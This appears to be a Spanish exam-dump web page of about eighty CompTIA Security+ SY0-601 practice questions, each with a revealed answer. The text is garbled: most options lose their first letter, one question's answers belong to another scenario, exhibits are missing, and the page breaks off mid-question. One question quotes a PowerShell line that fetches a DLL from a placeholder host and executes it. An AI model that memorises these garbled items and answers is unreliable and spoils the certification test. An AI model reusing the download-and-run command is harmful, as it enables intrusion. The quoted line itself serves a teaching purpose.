¿NO QUIERES PERDERTE NADA?

Consejos para aprobar el examen de certificación

Últimas noticias sobre exámenes e información sobre descuentos.

Curado y actualizado por nuestros expertos.

Sí, envíame el boletín.

Prepárese estratégicamente para el examen CompTIA Security+ con los exámenes de práctica SY0-601

Para la certificación CompTIA Security+ SY0-601, tener acceso a recursos de examen de alta calidad es esencial para una preparación efectiva. Las preguntas y respuestas del examen de práctica que reflejan con precisión el contenido y los objetivos del examen le permiten identificar las áreas que requieren más estudio. Las completas guías de estudio proporcionan explicaciones en profundidad de temas como la gestión de riesgos, la respuesta ante incidentes, la criptografía y la arquitectura de seguridad. Los cursos en vídeo de fuentes fiables ofrecen una forma atractiva de reforzar los conceptos clave. Los simulacros de examen que simulan el entorno real del examen ayudan a desarrollar las habilidades de gestión del tiempo y a familiarizarse con el formato del examen. La práctica regular con estos recursos de examen ayuda a reforzar su comprensión de los fundamentos de seguridad cubiertos en el examen SY0-601. Al incorporar una gama diversa de materiales de estudio, preguntas de práctica y exámenes de prueba en su preparación, aumenta sus posibilidades de aprobar exitosamente el examen de certificación CompTIA Security+.
Realizar otros exámenes en línea

Cuestionar #1
El Director de Seguridad de la Información quiere evitar la filtración de información confidencial de los teléfonos móviles de los empleados cuando utilizan estaciones de carga USB públicas. Cuál de las siguientes sería la MEJOR solución a implementar?
A. LP
B. loqueador de datos USB
C. SB OTG
D. esactivación de los puertos USB
Ver respuesta
Respuesta correcta: B
Cuestionar #2
Una empresa ha sufrido recientemente una importante pérdida de datos al filtrarse información confidencial a un competidor. La empresa tomó precauciones especiales mediante el uso de etiquetas adecuadas; sin embargo, los registros del filtro de correo electrónico no tienen constancia del incidente. Una investigación confirmó que la red corporativa no fue violada, pero los documentos se descargaron de la tableta COPE de un empleado y se pasaron al competidor a través del almacenamiento en la nube. ¿Cuál de las siguientes es la MEJOR solución para esta fuga de datos?
A. Formación de usuarios
B. ASB
C. DM
D. LP
Ver respuesta
Respuesta correcta: B
Cuestionar #3
Dos organizaciones planean colaborar en la evaluación de nuevas soluciones SIEM para sus respectivas empresas. Un esfuerzo combinado de los equipos SOC de ambas organizaciones aceleraría el esfuerzo. ¿Cuál de las siguientes opciones puede redactarse para documentar este acuerdo?
A. OU
B. SA
C. LA
D. DA
Ver respuesta
Respuesta correcta: A
Cuestionar #4
El Consejero Delegado (CEO) de una organización desea que los miembros del personal tengan la flexibilidad de trabajar desde casa en cualquier momento durante el horario laboral, incluso durante una pandemia o crisis. Sin embargo, al CEO le preocupa que algunos miembros del personal puedan aprovecharse de la flexibilidad y trabajar desde países de alto riesgo mientras están de vacaciones o subcontratar el trabajo a una organización externa en otro país. El Director General de Información (CIO) cree que la empresa puede implantar algunos controles básicos para mitigar el majo
A. RAT se instaló y está transfiriendo herramientas de explotación adicionales
B. Las estaciones de trabajo están enviando señales a un servidor de mando y control
C. na bomba lógica fue ejecutada y es responsable de las transferencias de datos
D. Un virus sin archivos se está propagando en el entorno de red local
Ver respuesta
Respuesta correcta: AB
Cuestionar #5
Un ingeniero de redes y un ingeniero de seguridad están discutiendo formas de supervisar las operaciones de la red. ¿Cuál de los siguientes es el MEJOR método?
A. esactivar Telnet y forzar SSH
B. stablecer un ping continuo
C. Utilizar un monitor sin agente
D. abilitar SNMPv3 con contraseñas
Ver respuesta
Respuesta correcta: C
Cuestionar #6
¿Cuál de las siguientes opciones suele utilizar una combinación de inteligencia humana y artificial para analizar datos de sucesos y tomar medidas sin intervención?
A. TP
B. SINT
C. OAR
D. IEM
Ver respuesta
Respuesta correcta: C
Cuestionar #7
Una empresa está implantando la AMF en todas las aplicaciones que almacenan datos confidenciales. El director de TI quiere que la AMF no cause interrupciones y sea fácil de usar. Cuál de las siguientes tecnologías debería utilizar el responsable de TI al implantar la AMF?
A. ontraseñas de un solo uso
B. ichas de correo electrónico
C. Notificaciones push
D. Autenticación por hardware
Ver respuesta
Respuesta correcta: C
Cuestionar #8
¿Cuál de los siguientes términos describe una amplia gama de información sensible para una organización específica?
A. Público
B. Alto secreto
C. ropietario
D. Código abierto
Ver respuesta
Respuesta correcta: C
Cuestionar #9
Una organización está planeando abrir otros centros de datos para mantener las operaciones en caso de desastre natural. Cuál de las siguientes consideraciones sería la MEJOR para la resistencia de la organización?
A. ispersión geográfica
B. otencia del generador
C. Extinción de incendios
D. Automatización de instalaciones
Ver respuesta
Respuesta correcta: A
Cuestionar #10
¿Cuál de los siguientes controles se utiliza para que una organización sea inicialmente consciente de un compromiso de datos?
A. Protección
B. reventivo
C. orrectivo
D. Detective
Ver respuesta
Respuesta correcta: D
Cuestionar #11
Un responsable de seguridad de la información de una organización está realizando una autoevaluación PCI DSS por primera vez. ¿Cuál de las siguientes es la razón MÁS probable para este tipo de evaluación?
A.
B. os consultores externos utilizan esta herramienta para medir la madurez de la seguridad
C. La organización espera procesar información de tarjetas de crédito
D. Un regulador gubernamental ha solicitado que se complete esta auditoríA
Ver respuesta
Respuesta correcta: C
Cuestionar #12
Un escáner de imágenes por resonancia magnética (IRM) conectado a la red de un hospital es controlado y operado por un SO Windows especializado obsoleto y sin soporte. Cuál de las siguientes opciones es la que MÁS probablemente impide al responsable de TI del hospital actualizar el sistema operativo especializado?
A.
B. El proveedor de la IRM no admite versiones más recientes del sistema operativo
C. Cambiar el sistema operativo incumple un acuerdo de nivel de servicio con el proveedor de IRM
D. l equipo informático no dispone del presupuesto necesario para actualizar el escáner de resonancia magnéticA
Ver respuesta
Respuesta correcta: B
Cuestionar #13
Un atacante ha determinado que la mejor forma de afectar a las operaciones es infiltrarse en proveedores de software de terceros. ¿Cuál de los siguientes vectores está siendo explotado?
A. Redes sociales
B. ube
C. adena de suministro
D. Ingeniería social
Ver respuesta
Respuesta correcta: C
Cuestionar #14
El SOC de un gran MSSP se reúne para discutir las lecciones aprendidas de un incidente reciente que tardó demasiado en resolverse. Este tipo de incidente se ha vuelto más común en las últimas semanas y está consumiendo grandes cantidades de tiempo de los analistas debido a las tareas manuales que se realizan. ¿Cuál de las siguientes soluciones debería considerar el SOC para MEJORAR su tiempo de respuesta?
A. onfigurar un dispositivo NIDS utilizando un Analizador de Puertos Conmutados
B. ecopilar OSINT y catalogar los artefactos en un repositorio central
C. mplantar un SOAR con playbooks personalizables
D. nstalar un SIEM con inteligencia de amenazas impulsada por la comunidad
Ver respuesta
Respuesta correcta: C
Cuestionar #15
Un analista de seguridad está utilizando OSINT para recopilar información para verificar si los datos de la empresa están disponibles públicamente. Cuál de las siguientes es la mejor aplicación que puede utilizar el analista?
A. lCosechador
B. uco
C. map
D. Nessus
Ver respuesta
Respuesta correcta: A
Cuestionar #16
¿Cuál de las siguientes opciones proporciona un valor calculado de las vulnerabilidades conocidas para que las organizaciones puedan priorizar las medidas de mitigación?
A. VSS
B. IEM
C. OAR
D. VE
Ver respuesta
Respuesta correcta: A
Cuestionar #17
Los socios comerciales están trabajando en un mecanismo de seguridad para validar las transacciones de forma segura. El requisito es que una empresa sea responsable de desplegar una solución de confianza que registre y emita artefactos utilizados para firmar, cifrar y descifrar archivos de transacciones. ¿Cuál de las siguientes es la MEJOR solución que se puede adoptar?
A. PKI
B. Blockchain
C. SAML
D. OAuth
Ver respuesta
Respuesta correcta: A
Cuestionar #18
¿Cuál de los siguientes es un riesgo de seguridad conocido asociado a los archivos de datos que contienen información financiera?
A.
B. os datos deben archivarse fuera de las instalaciones para evitar infracciones y cumplir los requisitos de la empresA
C. as empresas tienen prohibido facilitar datos archivados a las solicitudes de e-discovery
D. os archivos no cifrados deben conservarse el mayor tiempo posible y cifrarse
Ver respuesta
Respuesta correcta: A
Cuestionar #19
Una conocida organización ha estado sufriendo ataques de APT. A la organización le preocupa que se esté creando malware personalizado que se envía por correo electrónico a la empresa o se instala en memorias USB que se tiran en aparcamientos. ¿Cuál de las siguientes opciones es la MEJOR defensa contra esta situación?
A. onfigurar el antivirus basado en firmas para que se actualice cada 30 minutos
B. mponer S/MIME para el correo electrónico y cifrar automáticamente las unidades USB al insertarlas
C. mplementación de la ejecución de aplicaciones en un sandbox para software desconocido
D. Fuzzing de nuevos archivos en busca de vulnerabilidades si no están firmados digitalmente
Ver respuesta
Respuesta correcta: C
Cuestionar #20
Como parte de una evaluación de cumplimiento de seguridad, un auditor realiza escaneos automatizados de vulnerabilidades. Además, ¿cuál de las siguientes acciones debe realizar el auditor para completar la evaluación?
A. nálisis del comportamiento de los usuarios
B. aptura de paquetes
C. evisiones de configuración
D. Análisis de registros
Ver respuesta
Respuesta correcta: C
Cuestionar #21
Un responsable de seguridad informática solicita un informe sobre información de la empresa que está a disposición del público. La preocupación del responsable es que los actores maliciosos puedan acceder a los datos sin realizar un reconocimiento activo. ¿Cuál de las siguientes opciones es la MÁS eficaz para realizar el análisis?
A. roporcionar un parámetro de dominio a la herramientaHarvester
B. Compruebe las entradas DNS públicas utilizando dnsenum
C. ealizar un escaneo de vulnerabilidades Nessus dirigido a la IP de una empresa públicA
D. jecute nmap usando las opciones: scan all ports y sneaky mode
Ver respuesta
Respuesta correcta: A
Cuestionar #22
Un analista de seguridad observa una cantidad inusual de tráfico que llega al borde de la red. Al examinar los registros, el analista identifica una dirección IP de origen y bloquea esa dirección para que no se comunique con la red. Aunque el analista bloquea esta dirección, el ataque continúa y proviene de un gran número de direcciones IP de origen diferentes. ¿Cuál de las siguientes opciones describe este tipo de ataque?
A. DoS
B. Escalada de privilegios
C. nvenenamiento DNS
D. Desbordamiento del búfer
Ver respuesta
Respuesta correcta: A
Cuestionar #23
¿Cuál de los siguientes es un ejemplo de transferencia de riesgo?
A. ontratación de seguros
B. Parcheo de servidores vulnerables
C. etirada de aplicaciones obsoletas
D. Aprobación del riesgo por parte del propietario de la aplicación
Ver respuesta
Respuesta correcta: A
Cuestionar #24
¿Cuál de los siguientes controles de seguridad puede utilizarse para evitar que varias personas utilicen una única tarjeta magnética y sean admitidas en una entrada segura?
A. Registro de visitantes
B. aulas de Faraday
C. estíbulos de control de acceso
D. ensores de detección de movimiento
Ver respuesta
Respuesta correcta: C
Cuestionar #25
El departamento de marketing de una empresa minorista quiere publicar un sitio web interno en Internet para que sea accesible por un número limitado de proveedores de servicios externos específicos de forma segura. ¿Cuál de las siguientes configuraciones sería la MEJOR para cumplir este requisito?
A. AC
B. CL
C. AF
D. AT
Ver respuesta
Respuesta correcta: B
Cuestionar #26
Una empresa quiere migrar algunos servidores a la nube para minimizar su huella tecnológica. La empresa tiene un sistema de gestión de relaciones con los clientes en sus instalaciones. ¿Cuál de las siguientes soluciones requerirá MENOS infraestructura y soporte de aplicaciones por parte de la empresa?
A. aaS
B. aaS
C. aaS
D. DN
Ver respuesta
Respuesta correcta: A
Cuestionar #27
Un analista de ciberseguridad revisa los archivos de registro de un servidor web y ve una serie de archivos que indican que se ha producido un ataque a través de directorios. Cuál de las siguientes opciones es la que MÁS probablemente ve el analista?
A. ttp://sample
B. ttp://sample
C. ttp://sample
D. http://redirect
Ver respuesta
Respuesta correcta: B
Cuestionar #28
Un arquitecto de seguridad está diseñando una solución de acceso remoto para un socio comercial. El socio empresarial necesita acceder a un servidor Linux de la empresa. El socio comercial desea evitar la gestión de una contraseña para la autenticación y la instalación de software adicional. ¿Cuál de las siguientes opciones debería recomendar el arquitecto?
A. icha blanda
B. arjeta inteligente
C. SE
D. lave SSH
Ver respuesta
Respuesta correcta: D
Cuestionar #29
Un analista de seguridad quiere consultar una norma para desarrollar un programa de gestión de riesgos. ¿Cuál de las siguientes es la MEJOR fuente que puede utilizar el analista?
A. SAE SOC 2
B. SO 31000
C. CA DEL NIST
D. DPR
Ver respuesta
Respuesta correcta: B
Cuestionar #30
¿Cuál de las siguientes es la MAYOR preocupación de seguridad cuando se subcontrata el desarrollo de código a terceros para una aplicación orientada a Internet?
A. obo de propiedad intelectual
B. Privilegios elevados
C. Puerta trasera desconocida
D. Garantía de calidad
Ver respuesta
Respuesta correcta: C
Cuestionar #31
¿Cuál de los siguientes conceptos describe MEJOR el seguimiento y la documentación de los cambios en el software y la gestión del acceso a archivos y sistemas?
A. Control de versiones
B. ontrol continuo
C. Procedimientos almacenados
D. Automatización
Ver respuesta
Respuesta correcta: A
Cuestionar #32
¿Cuál de las siguientes herramientas es eficaz para evitar que un usuario acceda a medios extraíbles no autorizados?
A. loqueador de datos USB
B. aula de Faraday
C. ector de proximidad
D. Bloqueo por cable
Ver respuesta
Respuesta correcta: A
Cuestionar #33
Un analista de seguridad está revisando el informe de exploración de vulnerabilidades de un servidor web tras un incidente. La vulnerabilidad que se utilizó para explotar el servidor está presente en los informes históricos de análisis de vulnerabilidades, y hay un parche disponible para la vulnerabilidad. ¿Cuál de las siguientes es la causa MÁS probable?
A. os parches de seguridad fueron desinstalados debido al impacto en los usuarios
B. Un adversario alteró los informes de exploración de vulnerabilidades
C. Se utilizó una vulnerabilidad de día cero para explotar el servidor web
D. El escaneo reportó un falso negativo para la vulnerabilidad
Ver respuesta
Respuesta correcta: A
Cuestionar #34
Un analista de seguridad está investigando tráfico sospechoso en el servidor web ubicado en la dirección IP 10.10.1.1. Una búsqueda en los registros del WAF revela lo siguiente: ¿Cuál de las siguientes situaciones es la MÁS probable?
A. taque XSS
B. taque SQLi
C. Ataque de repetición
D. taque XSRF
Ver respuesta
Respuesta correcta: B
Cuestionar #35
¿Cuál de las siguientes es una política que proporciona una mayor profundidad y amplitud de conocimientos en una organización?
A. olítica de gestión de activos
B. olítica de separación de funciones
C. Política de uso aceptable
D. Política de rotación en el empleo
Ver respuesta
Respuesta correcta: D
Cuestionar #36
¿Cuál de las siguientes opciones sería la MEJOR para realizar controles detectivos y correctivos de la termorregulación?
A. n detector de humo
B. alarma de incendios
C. n sistema de climatización
D. Un sistema de extinción de incendios
E. uardias
Ver respuesta
Respuesta correcta: C
Cuestionar #37
Un analista de seguridad observa que se están borrando archivos específicos cada vez que un administrador de sistemas está de vacaciones. ¿Cuál de las siguientes opciones describe MEJOR el tipo de malware que se está ejecutando?
A. irus sin archivos
B. omba lógica
C. egistrador de teclas
D. Ransomware
Ver respuesta
Respuesta correcta: B
Cuestionar #38
¿Cuál de las siguientes es una herramienta eficaz para detener o evitar la filtración de datos de una red?
A. LP
B. IDS
C. PM
D. DE
Ver respuesta
Respuesta correcta: A
Cuestionar #39
A un visitante de un sitio web se le exige que proporcione información con el formato adecuado en un campo específico de un formulario de un sitio web. ¿Cuál de las siguientes medidas de seguridad es más probable que se utilice para este mandato?
A. Validación de las entradas
B. Firma de códigos
C. nyección SQL
D. Presentación de formularios
Ver respuesta
Respuesta correcta: A
Cuestionar #40
Un administrador de seguridad sospecha que puede haber servicios innecesarios ejecutándose en un servidor. Cuál de las siguientes herramientas utilizará MÁS probablemente el administrador para confirmar las sospechas?
A. map
B. ireshark
C. utopsia
D. NSEnum
Ver respuesta
Respuesta correcta: A
Cuestionar #41
Una empresa ha instalado un punto de acceso WiFi en una zona pública y desea reforzar la configuración para que sea más segura. Después de realizar una evaluación, un analista identifica que el punto de acceso está configurado para utilizar WPA3, AES, WPS y RADIUS. ¿Cuál de las siguientes opciones debería desactivar el analista para mejorar la seguridad del punto de acceso?
A. PA3
B. ES
C. ADIUS
D. PS
Ver respuesta
Respuesta correcta: D
Cuestionar #42
Una empresa de fabricación tiene varios sistemas de información heredados que no pueden migrarse a un sistema operativo más reciente por problemas de compatibilidad de software. Los sistemas operativos siguen siendo compatibles con el proveedor, pero el software industrial ya no lo es. El Director de Seguridad de la Información ha creado un plan de resiliencia para estos sistemas que permitirá instalar parches del SO en un entorno de no producción, a la vez que se crean copias de seguridad de los sistemas para su recuperación. ¿Cuál de las siguientes técnicas de resiliencia
A. edundancia
B. AID 1+5
C. Máquinas virtuales
D. Copias de seguridad completas
Ver respuesta
Respuesta correcta: C
Cuestionar #43
Un nuevo ingeniero de seguridad ha empezado a reforzar sistemas. Una de las técnicas de refuerzo que está utilizando consiste en desactivar los inicios de sesión remotos en el NAS. Ahora, los usuarios informan de que no pueden utilizar SCP para transferir archivos al NAS, aunque los datos siguen siendo visibles desde los PC de los usuarios. ¿Cuál de las siguientes es la causa MÁS probable de este problema?
A. FTP fue desactivado en los hosts locales
B. SH fue desactivado en lugar de modificar el archivo de configuración
C. l login remoto fue deshabilitado en el networkd
D. Los servicios de red ya no se ejecutan en el NAS
Ver respuesta
Respuesta correcta: B
Cuestionar #44
Una organización ha lanzado recientemente una política de aseguramiento de software que requiere que los desarrolladores ejecuten escaneos de código cada noche en el repositorio. Después de la primera noche, el equipo de seguridad alertó a los desarrolladores de que se habían notificado más de 2.000 incidencias que debían solucionarse. ¿Cuál de las siguientes es la causa MÁS probable del elevado número de hallazgos?
A. l escáner de vulnerabilidades no estaba bien configurado y generaba un elevado número de falsos positivos
B. e han cargado librerías de terceros en el repositorio y deben ser eliminadas del código base
C. l escáner de vulnerabilidades encontró varias fugas de memoria durante el tiempo de ejecución, causando informes duplicados para el mismo problemA
D. l escáner de vulnerabilidades no se cargó con los puntos de referencia correctos y necesita actualizarse
Ver respuesta
Respuesta correcta: A
Cuestionar #45
Un administrador de seguridad examina la tabla ARP de un switch de acceso y ve la siguiente salida:
A. DoS en el puerto Fa0/2
B. nundación MAC en el puerto Fa0/2
C. nvenenamiento ARP en el puerto Fa0/1
D. Envenenamiento DNS en el puerto Fa0/1
Ver respuesta
Respuesta correcta: B
Cuestionar #46
Un analista de seguridad está evaluando los riesgos de autorizar múltiples soluciones de seguridad para recopilar datos del entorno de nube de la empresa. Cuál de las siguientes es una consecuencia inmediata de estas integraciones?
A. ncumplimiento de las normas sobre soberanía de datos
B. érdida del soporte de interoperabilidad de los proveedores
C. mplantación obligatoria de una solución SIEM
D. Aumento de la superficie de ataque
Ver respuesta
Respuesta correcta: D
Cuestionar #47
¿Cuál de los siguientes controles proporcionaría la MEJOR protección contra el tailgating?
A. estíbulo de control de acceso
B. ircuito cerrado de televisión
C. ector de tarjetas de proximidad
D. aula de Faraday
Ver respuesta
Respuesta correcta: A
Cuestionar #48
Un analista de seguridad está buscando una solución para ayudar a comunicar al equipo de liderazgo los niveles de gravedad de las vulnerabilidades de la organización. ¿Cuál de las siguientes sería la MEJOR solución?
A. VE
B. IEM
C. OAR
D. VSS
Ver respuesta
Respuesta correcta: D
Cuestionar #49
¿Cuál de los siguientes componentes puede utilizarse para consolidar y reenviar el tráfico entrante de Internet a varios entornos de nube a través de un único cortafuegos?
A. asarela de tránsito
B. loud hot site
C. dge computing
D. NS sumidero
Ver respuesta
Respuesta correcta: A
Cuestionar #50
Una organización mantiene varios entornos en los que se desarrollan y prueban los parches antes de pasarlos a un estado operativo. ¿Cuál de los siguientes es el entorno en el que se desplegarán los parches justo antes de su puesta en estado operativo?
A. esarrollo
B. est
C. roducción
D. uesta en escena
Ver respuesta
Respuesta correcta: D
Cuestionar #51
Un empleado recibió un correo electrónico con un archivo adjunto inusual llamado Updates.lnk. Un analista de seguridad está haciendo ingeniería inversa de lo que hace el archivo y descubre que ejecuta el siguiente script:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -URI https://somehost.com/04EB18.jpg -OutFile $env:TEMPautoupdate.dll;Start-Process rundl132.exe $env:TEMPautoupdate.dll¿Cuál de las siguientes opciones describe MEJOR lo que ha encontrado el analista?
A. n código PowerShell está realizando una inyección DLL
B. n código PowerShell está mostrando una imagen
C. n código PowerShell está configurando variables de entorno
D. n código PowerShell está cambiando la configuración de Windows Update
Ver respuesta
Respuesta correcta: A
Cuestionar #52
Un analista de seguridad está revisando los registros de un ordenador porque un host se ha visto comprometido por un malware. Tras infectarse, el ordenador mostró una pantalla de error y se apagó. ¿Cuál de los siguientes elementos debería revisar primero el analista para obtener más información?
A. rchivo de volcado
B. egistro del sistema
C. egistro de aplicaciones web
D. Registro de seguridad
Ver respuesta
Respuesta correcta: A
Cuestionar #53
¿Cuál de las siguientes opciones mide el tiempo medio de funcionamiento de un equipo antes de que se rompa?
A. LE
B. TBF
C. TO
D. RO
Ver respuesta
Respuesta correcta: B
Cuestionar #54
¿Cuál de los siguientes es un riesgo asociado específicamente al alojamiento de aplicaciones en la nube pública?
A. uentas raíz no garantizadas
B. Día cero
C. Alquiler compartido
D. Amenaza interna
Ver respuesta
Respuesta correcta: C
Cuestionar #55
Un atacante sustituye un documento firmado digitalmente por otra versión que pasa desapercibida. Al revisar el contenido del documento, el autor se da cuenta de que hay algo de palabrería adicional que no estaba originalmente en el documento, pero no puede validar un problema de integridad. ¿Cuál de los siguientes ataques se utilizó?
A. ryptomalware
B. ustitución Hash
C. olisión
D. Suplantación de identidad
Ver respuesta
Respuesta correcta: B
Cuestionar #56
Un ingeniero de seguridad debe instalar dos routers inalámbricos en una oficina. Otros inquilinos del edificio de oficinas no deben poder conectarse a esta red inalámbrica. ¿Cuál de los siguientes protocolos debe implementar el ingeniero para garantizar el cifrado MÁS FUERTE?
A. PS
B. PA2
C. AP
D. TTPS
Ver respuesta
Respuesta correcta: B
Cuestionar #57
Se ha resuelto un incidente de seguridad. ¿Cuál de las siguientes opciones describe MEJOR la importancia de la fase final del plan de respuesta a incidentes?
A. xamina y documenta lo bien que respondió el equipo, descubre qué causó el incidente y determina cómo puede evitarse el incidente en el futuro
B. evuelve los sistemas afectados a la producción una vez que los sistemas han sido completamente parcheados, los datos restaurados y las vulnerabilidades solucionadas
C. dentifica el incidente y el alcance de la violación, cómo afecta al entorno de producción y el punto de entradA
D. Contiene los sistemas afectados y los desconecta de la red, evitando que el ataque o la brecha se sigan propagando
Ver respuesta
Respuesta correcta: A
Cuestionar #58
¿Cuál de las siguientes es una razón para publicar los hashes de los archivos?
A. ara validar la integridad de los archivos
B. ara verificar si el software fue firmado digitalmente
C. Para utilizar el hash como clave de activación del software
D. Para utilizar el hash como frase de contraseña de descifrado
Ver respuesta
Respuesta correcta: A
Cuestionar #59
Una empresa que ofrece un servicio de streaming en línea hizo públicos los datos personales de sus clientes, incluidos nombres y direcciones de correo electrónico, en un servicio de almacenamiento en la nube. Como resultado, la empresa experimentó un aumento en el número de solicitudes de eliminación de cuentas de usuario. ¿Cuál de las siguientes opciones describe MEJOR la consecuencia de esta revelación de datos?
A. Multas reglamentarias
B. Daños a la reputación
C. umento de los costes de los seguros
D. Pérdidas financieras
Ver respuesta
Respuesta correcta: B
Cuestionar #60
¿Cuál de los siguientes tipos de control sería MEJOR utilizar en un departamento de contabilidad para reducir las pérdidas por transacciones fraudulentas?
A. ecuperación
B. Disuasión
C. orrectivo
D. Detective
Ver respuesta
Respuesta correcta: D
Cuestionar #61
Un analista de seguridad recibe una alerta del SIEM de la empresa que indica que una actividad anómala procede de una dirección IP de origen local 192.168.34.26. El Jefe de Seguridad de la Información pide al analista que bloquee la fuente de origen. El Jefe de Seguridad de la Información pide al analista que bloquee la fuente de origen. Varios días después, otro empleado abre un ticket interno indicando que los escaneos de vulnerabilidad ya no se están realizando correctamente. La dirección IP que proporciona el empleado es 192.168.34.26. ¿Cuál de las siguientes opciones describe este tipo de alerta?
A. erdadero negativo
B. erdadero positivo
C. Falso positivo
D. Falso negativo
Ver respuesta
Respuesta correcta: C
Cuestionar #62
Una empresa necesita validar su plan actualizado de respuesta a incidentes utilizando un escenario real que ponga a prueba los puntos de decisión y las acciones pertinentes de respuesta a incidentes sin interrumpir las operaciones diarias. Cuál de las siguientes opciones sería la MEJOR para satisfacer los requisitos de la empresa?
A. Ejercicio de equipo rojo
B. Ejercicio de captura de la bandera
C. jercicio de mesa
D. Ejercicio de phishing
Ver respuesta
Respuesta correcta: C
Cuestionar #63
El Director de Seguridad (CSO) de una organización quiere validar la participación de la empresa en el plan de respuesta a incidentes para garantizar su validez y exhaustividad. ¿Cuál de las siguientes opciones utilizará MÁS probablemente el CSO?
A. Una evaluación externa de la seguridad
B. n programa de recompensas por fallos
C. Un ejercicio de mesa
D. Un compromiso del equipo rojo
Ver respuesta
Respuesta correcta: C
Cuestionar #64
Una importante empresa manufacturera actualizó su infraestructura interna y hace poco comenzó a permitir que las aplicaciones OAuth accedan a los datos corporativos. Ahora se está informando de fugas de datos. ¿Cuál de las siguientes es la causa MÁS probable del problema?
A. Filtración de privilegios
B. justes por defecto sin modificar
C. ulnerabilidades del protocolo TLS
D. Gestión inadecuada de los parches
Ver respuesta
Respuesta correcta: B
Cuestionar #65
Un ejecutivo del sector minorista ha aceptado recientemente un trabajo en un importante competidor. La semana siguiente, un analista de seguridad revisa los registros de seguridad e identifica intentos de inicio de sesión exitosos para acceder a las cuentas del ejecutivo saliente. ¿Cuál de las siguientes prácticas de seguridad habría resuelto el problema?
A. n acuerdo de confidencialidad
B. Menor privilegio
C. Una política de uso aceptable
D. ffboarding
Ver respuesta
Respuesta correcta: D
Cuestionar #66
Un analista de seguridad está investigando un informe de una prueba de penetración. Durante la prueba de penetración, los consultores pudieron descargar datos confidenciales de un servidor back-end. El servidor back-end exponía una API que sólo debería haber estado disponible desde la aplicación móvil de la empresa. Tras revisar los registros del servidor back-end, el analista de seguridad encuentra las siguientes entradas:¿Cuál de las siguientes es la causa más probable de la omisión del control de seguridad?
A. ista de direcciones IP permitidas
B. Suplantación de agente de usuario
C. AF bypass
D. Manipulación de remitentes
Ver respuesta
Respuesta correcta: B
Cuestionar #67
¿Cuál de las siguientes es la MEJOR acción para fomentar un proceso de respuesta a incidentes coherente y auditable?
A. ncentivar a los nuevos contratados para que actualicen constantemente el documento con conocimientos externos
B. ublicar el documento en un repositorio central de fácil acceso para la organización
C. Restringir la posibilidad de hacer comentarios sobre el proceso a los expertos en la materia de cada silo de TI
D. otar a los miembros del CIRT para fomentar un modelo de responsabilidad compartida en la organización
Ver respuesta
Respuesta correcta: D
Cuestionar #68
Una empresa está trasladando su sitio web de venta al por menor a un proveedor de nube pública. La empresa desea tokenizar los datos de las tarjetas de crédito pero no permitir que el proveedor de la nube vea la información almacenada de las tarjetas de crédito. ¿Cuál de las siguientes opciones sería la MEJOR para alcanzar estos objetivos?
A. AF
B. ASB
C. PN
D. LS
Ver respuesta
Respuesta correcta: B
Cuestionar #69
Una empresa desea simplificar el proceso de gestión de certificados. La empresa tiene un único dominio con varias docenas de subdominios, todos ellos de acceso público en Internet. ¿Cuál de las siguientes opciones describe MEJOR el tipo de certificado que la empresa debería implantar?
A. ombre alternativo del asunto
B. omodín
C. Autofirmado
D. Validación del dominio
Ver respuesta
Respuesta correcta: B
Cuestionar #70
Un analista de seguridad ha generado un archivo llamado host1.pcap y lo ha compartido con un miembro del equipo que lo va a utilizar para un análisis posterior del incidente. Cuál de las siguientes herramientas utilizará MÁS probablemente el otro miembro del equipo para abrir este archivo?
A. utopsia
B. emdump
C. TK imager
D. Wireshark
Ver respuesta
Respuesta correcta: D
Cuestionar #71
El gestor responsable de un conjunto de datos ha pedido a un ingeniero de seguridad que aplique el cifrado a los datos de un disco duro. El ingeniero de seguridad es un ejemplo de __________.
A. Controlador de datos
B. ropietario de los datos
C. Custodio de datos
D. procesador de datos
Ver respuesta
Respuesta correcta: C
Cuestionar #72
Un administrador de seguridad necesita bloquear una conexión TCP usando el firewall corporativo. Debido a que esta conexión es potencialmente una amenaza, el administrador no quiere devolver un RST. ¿Cuál de las siguientes acciones en la regla del cortafuegos funcionaría MEJOR?
A. rop
B. echazar
C. lerta de registro
D. Permiso
Ver respuesta
Respuesta correcta: A
Cuestionar #73
Un administrador de seguridad necesita inspeccionar archivos en tránsito en la red de la empresa para buscar PII, datos de tarjetas de crédito y palabras de clasificación. ¿Cuál de las siguientes opciones sería la MEJOR?
A. olución IDS
B. olución EDR
C. olución de software HIPS
D. olución DLP de red
Ver respuesta
Respuesta correcta: D
Cuestionar #74
HOTSPOT (No se admite la función de arrastrar y soltar)Se ha producido un incidente en el entorno de producción.INSTRUCCIONESAnalice las salidas de comandos e identifique el tipo de compromiso.Si en algún momento desea volver al estado inicial de la simulación, haga clic en el botón Restablecer todo.Hot Area:
A. Consulte la respuesta en la sección Explicación
Ver respuesta
Respuesta correcta: A
Cuestionar #75
¿Cuál de los siguientes es un ataque dirigido a usuarios de un sector o grupo específico?
A. gujero de riego
B. Propiedad intelectual
C. oax
D. Suplantación
Ver respuesta
Respuesta correcta: A
Cuestionar #76
Una empresa tiene una red plana en la nube. La empresa necesita implementar una solución para segmentar sus servidores de producción y no producción sin migrar los servidores a una nueva red. Cuál de las siguientes soluciones debería implementar la empresa?
A. ntranet
B. ubred filtrada
C. egmentación VLAN
D. Confianza cero
Ver respuesta
Respuesta correcta: C
Cuestionar #77
Un administrador de seguridad, que está trabajando para una organización gubernamental, le gustaría utilizar la clasificación y la planificación granular para asegurar los datos de alto secreto y conceder acceso en base a la necesidad de saber. Cuál de los siguientes esquemas de control de acceso debería considerar el administrador?
A. Obligatorio
B. Basado en reglas
C. iscrecional
D. Basado en funciones
Ver respuesta
Respuesta correcta: A
Cuestionar #78
Durante una evaluación de seguridad, un analista de seguridad encuentra un archivo con permisos demasiado permisivos. Cuál de las siguientes herramientas permitirá al analista reducir los permisos para los usuarios y grupos existentes y eliminar el bit set-user-ID del archivo?
A. s
B. hflags
C. hmod
D. sof
E. etuid
Ver respuesta
Respuesta correcta: C
Cuestionar #79
¿Cuál de las siguientes opciones es necesaria para que un IDS y un WAF sean efectivos en el tráfico HTTPS?
A. ashing
B. NS sumidero
C. nspección TLS
D. Enmascaramiento de datos
Ver respuesta
Respuesta correcta: C
Cuestionar #80
Un ingeniero de redes está solucionando los problemas de conectividad de la red inalámbrica notificados por los usuarios. Los problemas sólo se producen en la sección del edificio más cercana al aparcamiento. Los usuarios experimentan de forma intermitente velocidades lentas al acceder a sitios web y no pueden conectarse a unidades de red. Los problemas parecen aumentar cuando los usuarios de portátiles regresan a sus escritorios después de utilizar sus dispositivos en otras zonas del edificio. También se ha informado de que los usuarios se ven obligados a entrar en el
